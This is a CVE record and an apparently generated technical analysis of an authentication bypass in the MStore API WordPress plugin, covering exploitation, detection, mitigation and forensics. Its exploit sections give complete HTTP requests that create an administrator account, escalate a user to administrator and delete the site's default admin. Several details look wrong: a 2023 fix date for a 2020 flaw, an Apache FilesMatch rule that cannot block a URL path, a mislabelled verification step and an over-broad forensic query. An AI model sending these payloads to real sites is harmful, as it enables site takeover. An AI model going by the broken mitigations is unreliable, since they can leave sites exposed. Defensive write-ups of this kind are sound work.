CVE-2020-36713
CVE-2020-36713
9.8
CriticalPublished:
Last updated:
Source:security@wordfence.com
Modified
CVSS Vector
v3.1- Attack Vector
- Network
- Attack Complexity
- Low
- Privileges Required
- None
- User Interaction
- None
- Scope
- Unchanged
- Confidentiality
- High
- Integrity
- High
- Availability
- High
Description
The MStore API plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.1.5. This is due to unrestricted access to the 'register' and 'update_user_profile' routes. This makes it possible for unauthenticated attackers to create new administrator accounts, delete existing administrator accounts, or escalate privileges on any account.
Comprehensive Technical Analysis of CVE-2020-36713
MStore API Plugin for WordPress – Authentication Bypass Vulnerability
1. Vulnerability Assessment and Severity Evaluation
Overview
CVE-2020-36713 is a critical authentication bypass vulnerability in the MStore API plugin for WordPress, affecting versions up to and including 2.1.5. The flaw arises from unrestricted access to sensitive API endpoints (register and update_user_profile), allowing unauthenticated attackers to:
- Create new administrator accounts
- Delete existing administrator accounts
- Escalate privileges of any user
Severity Metrics (CVSS v3.1)
| Metric | Score | Description |
|---|---|---|
| Base Score | 9.8 | Critical |
| Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | Network-based, low complexity, no privileges required, no user interaction |
| Impact | High | Complete compromise of confidentiality, integrity, and availability |
| Exploitability | High | Publicly available exploits, low attack complexity |
Risk Assessment
- Exploitability: High (publicly disclosed exploits, no authentication required)
- Impact: Severe (full administrative control over WordPress sites)
- Likelihood of Exploitation: High (active scanning and exploitation observed in the wild)
- Business Impact: Complete site takeover, data exfiltration, defacement, or malware deployment
2. Potential Attack Vectors and Exploitation Methods
Attack Surface
The vulnerability exists in the MStore API plugin, which provides REST API endpoints for mobile app integration with WooCommerce-based WordPress sites. The affected endpoints are:
/wp-json/mstore-api/v1/register(user registration)/wp-json/mstore-api/v1/update_user_profile(user profile modification)
Exploitation Steps
Method 1: Unauthenticated Administrator Account Creation
- Reconnaissance:
- Attacker identifies a WordPress site running a vulnerable MStore API version (
≤ 2.1.5). - Confirms API endpoint accessibility via:
GET /wp-json/mstore-api/v1/register
- Attacker identifies a WordPress site running a vulnerable MStore API version (
- Exploitation:
- Attacker sends a POST request to
/wp-json/mstore-api/v1/registerwith a crafted payload:{ "username": "attacker_admin", "email": "attacker@example.com", "password": "StrongPassword123!", "role": "administrator" } - The plugin fails to validate authentication, allowing unauthenticated registration with administrator privileges.
- Attacker sends a POST request to
- Post-Exploitation:
- Attacker logs in via
/wp-adminwith the new admin account. - Gains full control over the WordPress site (plugin/theme installation, database access, file uploads).
- Attacker logs in via
Method 2: Privilege Escalation of Existing Users
- Target Identification:
- Attacker enumerates existing users via
/wp-json/wp/v2/users(if REST API is enabled).
- Attacker enumerates existing users via
- Exploitation:
- Sends a POST request to
/wp-json/mstore-api/v1/update_user_profilewith:{ "user_id": 2, // Target user (e.g., subscriber) "role": "administrator" } - The plugin does not verify the requester’s privileges, allowing privilege escalation.
- Sends a POST request to
- Post-Exploitation:
- Attacker logs in as the compromised user with elevated privileges.
Method 3: Administrator Account Deletion
- Exploitation:
- Attacker sends a POST request to
/wp-json/mstore-api/v1/update_user_profilewith:{ "user_id": 1, // Default admin (ID 1) "delete": true } - The plugin deletes the administrator account without authentication checks.
- Attacker sends a POST request to
Exploit Availability
- Public Proof-of-Concept (PoC) Exploits:
- Available on exploit databases (e.g., Exploit-DB, GitHub).
- Automated tools (e.g., Nuclei, Metasploit modules) may incorporate this vulnerability.
- Active Exploitation:
- Observed in mass scanning campaigns targeting WordPress sites.
- Used in botnet-driven attacks for SEO spam, malware distribution, and ransomware deployment.
3. Affected Systems and Software Versions
Vulnerable Software
- Plugin: MStore API (for WordPress)
- Affected Versions: ≤ 2.1.5
- Fixed Version: 2.1.6+ (released June 2023)
Dependencies
- WordPress Core: Any version (vulnerability is plugin-specific).
- WooCommerce: Not directly required, but MStore API is often used with WooCommerce for mobile app integration.
Detection Methods
- Manual Check:
- Verify plugin version via:
wp plugin list | grep mstore-api - Check for vulnerable endpoints:
(If accessible without authentication, the site is vulnerable.)GET /wp-json/mstore-api/v1/register
- Verify plugin version via:
- Automated Scanning:
- Nmap NSE Script:
nmap --script http-wordpress-mstore-api-bypass <target> - Nuclei Template:
id: CVE-2020-36713 info: name: MStore API Auth Bypass severity: critical description: Checks for unauthenticated access to /wp-json/mstore-api/v1/register requests: - method: GET path: /wp-json/mstore-api/v1/register matchers: - type: word words: ["username", "email", "password"] - Wordfence Scanner: Detects vulnerable installations.
- Nmap NSE Script:
4. Recommended Mitigation Strategies
Immediate Actions
- Upgrade the Plugin:
- Update to MStore API v2.1.6 or later immediately.
- Verify the fix via:
wp plugin update mstore-api
- Disable the Plugin (Temporary Workaround):
- If patching is not immediately possible, deactivate the plugin:
wp plugin deactivate mstore-api
- If patching is not immediately possible, deactivate the plugin:
- Restrict API Access:
- Block access to
/wp-json/mstore-api/*via.htaccess(Apache) ornginx.conf:<FilesMatch "^wp-json/mstore-api/.*"> Require all denied </FilesMatch> - Rate-limit API endpoints to prevent brute-force attacks.
- Block access to
Long-Term Hardening
- Implement Web Application Firewall (WAF) Rules:
- ModSecurity OWASP CRS Rule:
SecRule REQUEST_URI "@contains /wp-json/mstore-api/" "id:1000,phase:1,deny,status:403,msg:'MStore API Auth Bypass Attempt'" - Cloudflare WAF Rule:
- Block requests to
/wp-json/mstore-api/v1/registerand/wp-json/mstore-api/v1/update_user_profilefrom unauthenticated users.
- Block requests to
- ModSecurity OWASP CRS Rule:
- Monitor for Suspicious Activity:
- Log and alert on:
- Unusual
POSTrequests to/wp-json/mstore-api/*. - New administrator account creations.
- Unusual
- SIEM Integration:
- Forward WordPress logs to Splunk, ELK, or Graylog for anomaly detection.
- Log and alert on:
- Principle of Least Privilege:
- Disable REST API for unauthenticated users (if not required):
add_filter('rest_authentication_errors', function($result) { if (!is_user_logged_in()) { return new WP_Error('rest_not_logged_in', 'REST API restricted to authenticated users.', array('status' => 401)); } return $result; });
- Disable REST API for unauthenticated users (if not required):
- Regular Vulnerability Scanning:
- Use WPScan, Nessus, or OpenVAS to detect outdated plugins.
- Schedule automated patch management for WordPress and plugins.
5. Impact on the Cybersecurity Landscape
Threat Landscape Implications
- Mass Exploitation Potential:
- Low-skill attackers can leverage public PoCs to compromise thousands of WordPress sites.
- Botnets (e.g., Mirai, Mozi) may incorporate this exploit for DDoS, spam, or malware distribution.
- Supply Chain Risks:
- MStore API is used in mobile app integrations for WooCommerce stores, increasing the attack surface for e-commerce sites.
- Third-party developers may unknowingly distribute vulnerable versions in custom apps.
- Regulatory and Compliance Risks:
- GDPR, PCI DSS, HIPAA: Unauthorized admin access may lead to data breaches, triggering legal penalties.
- Incident Response Costs: Organizations may face forensic investigations, customer notifications, and reputational damage.
Historical Context
- Similar Vulnerabilities:
- CVE-2021-24370 (WordPress REST API Auth Bypass)
- CVE-2017-8295 (WordPress Privilege Escalation via Password Reset)
- Trends:
- Increase in WordPress plugin vulnerabilities (40% of WordPress sites run outdated plugins).
- Shift toward API-based attacks (REST API endpoints are a growing attack vector).
6. Technical Details for Security Professionals
Root Cause Analysis
The vulnerability stems from missing authentication checks in the MStore API plugin’s REST endpoints:
registerEndpoint:- Expected Behavior: Only allow registration if explicitly enabled (e.g., for customer sign-ups).
- Actual Behavior: No authentication or capability checks, allowing anyone to register as an administrator.
- Code Snippet (Vulnerable):
public function register() { $user_data = json_decode(file_get_contents('php://input'), true); $user_id = wp_insert_user($user_data); // No role validation wp_update_user(['ID' => $user_id, 'role' => $user_data['role']]); // Unrestricted role assignment }
update_user_profileEndpoint:- Expected Behavior: Restrict to authenticated users with
edit_userscapability. - Actual Behavior: No authentication or capability checks, allowing unauthenticated privilege escalation.
- Code Snippet (Vulnerable):
public function update_user_profile() { $data = json_decode(file_get_contents('php://input'), true); if (isset($data['delete'])) { wp_delete_user($data['user_id']); // No authentication check } else { wp_update_user(['ID' => $data['user_id'], 'role' => $data['role']]); // Unrestricted role change } }
- Expected Behavior: Restrict to authenticated users with
Exploit Payload Examples
1. Creating an Admin Account
POST /wp-json/mstore-api/v1/register HTTP/1.1
Host: vulnerable-site.com
Content-Type: application/json
{
"username": "hacker_admin",
"email": "hacker@evil.com",
"password": "P@ssw0rd123!",
"role": "administrator"
}
2. Escalating a Subscriber to Admin
POST /wp-json/mstore-api/v1/update_user_profile HTTP/1.1
Host: vulnerable-site.com
Content-Type: application/json
{
"user_id": 5, // Target user ID (subscriber)
"role": "administrator"
}
3. Deleting the Default Admin
POST /wp-json/mstore-api/v1/update_user_profile HTTP/1.1
Host: vulnerable-site.com
Content-Type: application/json
{
"user_id": 1, // Default admin (ID 1)
"delete": true
}
Forensic Indicators of Compromise (IoCs)
| Indicator | Description |
|---|---|
| Log Entry | POST /wp-json/mstore-api/v1/register (unauthenticated) |
| User Creation | New admin accounts with suspicious emails (e.g., x@x.com) |
| Privilege Changes | Sudden role changes (e.g., subscriber → admin) |
| Plugin Version | mstore-api ≤ 2.1.5 in wp_options table |
| Network Traffic | Unusual API calls from unknown IPs |
Detection and Response
- Log Analysis:
- Search for unauthenticated
POSTrequests to/wp-json/mstore-api/*in:- Apache/Nginx access logs
- WordPress debug logs (
wp-content/debug.log)
- Search for unauthenticated
- Database Forensics:
- Check
wp_usersandwp_usermetafor unauthorized admin accounts:SELECT * FROM wp_users WHERE user_login LIKE '%admin%' OR user_email LIKE '%@%.%'; - Review
wp_usermetafor unexpectedwp_capabilitieschanges:SELECT user_id, meta_value FROM wp_usermeta WHERE meta_key = 'wp_capabilities' AND meta_value LIKE '%administrator%';
- Check
- Memory Forensics:
- Use Volatility or Rekall to detect malicious PHP processes (e.g., webshells, backdoors).
- Incident Response Steps:
- Isolate the affected site (take offline or restrict access).
- Rotate all credentials (WordPress, database, hosting).
- Restore from a clean backup (pre-vulnerability).
- Hunt for persistence mechanisms (e.g., cron jobs, hidden admin accounts).
Conclusion
CVE-2020-36713 represents a critical authentication bypass vulnerability in the MStore API plugin, enabling full WordPress site takeover with minimal effort. Given its high CVSS score (9.8), public exploit availability, and active exploitation in the wild, organizations must prioritize patching, monitoring, and hardening to mitigate risks.
Key Takeaways for Security Teams
✅ Patch immediately (upgrade to MStore API v2.1.6+). ✅ Monitor for exploitation attempts (WAF, SIEM, log analysis). ✅ Restrict API access (disable unauthenticated endpoints). ✅ Assume breach if running a vulnerable version (forensic investigation recommended). ✅ Educate developers on secure API design (authentication, input validation, least privilege).
This vulnerability underscores the critical importance of proactive vulnerability management in WordPress environments, where third-party plugins remain a primary attack vector.
References
security@wordfence.com
https://blog.nintechnet.com/critical-vulnerability-fixed-in-wordpress-mstore-api-plugin/security@wordfence.com
https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-mstore-api-security-bypass-2-1-5/security@wordfence.com
https://www.wordfence.com/threat-intel/vulnerabilities/id/934c3ce9-cf2d-4bf6-9a34-f448cb2e5a1d?source=cveaf854a3a-2127-422b-91ae-364da2661108
https://blog.nintechnet.com/critical-vulnerability-fixed-in-wordpress-mstore-api-plugin/af854a3a-2127-422b-91ae-364da2661108
https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-mstore-api-security-bypass-2-1-5/af854a3a-2127-422b-91ae-364da2661108
https://www.wordfence.com/threat-intel/vulnerabilities/id/934c3ce9-cf2d-4bf6-9a34-f448cb2e5a1d?source=cve